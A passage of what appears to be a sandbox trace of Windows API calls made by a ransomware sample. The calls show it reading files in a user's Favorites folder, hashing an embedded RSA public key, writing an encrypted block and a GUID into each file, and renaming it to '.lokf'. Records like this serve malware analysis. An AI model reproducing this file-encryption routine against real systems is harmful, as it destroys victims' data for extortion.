lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.803] CloseHandle (hObject=0x5cc) returned 1 [0059.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0059.804] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.lokf")) returned 1 [0059.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.804] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.805] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0059.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.806] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0059.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.806] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.806] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.808] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.808] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.809] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.809] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.809] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.809] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.809] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.810] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.810] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.810] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.810] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.810] GetLastError () returned 0x0 [0059.810] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.810] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.810] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.810] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.810] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.810] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.810] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88490 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c858f0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c884d8 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85908 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85938 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85950 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.811] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85950 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85950 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85938 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.811] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85950 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.812] GetCurrentThreadId () returned 0x9e0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c849b8 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.812] GetCurrentThreadId () returned 0x9e0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.812] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85938 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85950 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85920 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85968 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.813] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85938 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85938 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85968 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85950 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85920 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85908 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c884d8 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.815] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.815] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.815] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.815] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.815] CloseHandle (hObject=0x5cc) returned 1 [0059.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.816] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.lokf")) returned 1 [0059.817] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0059.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, 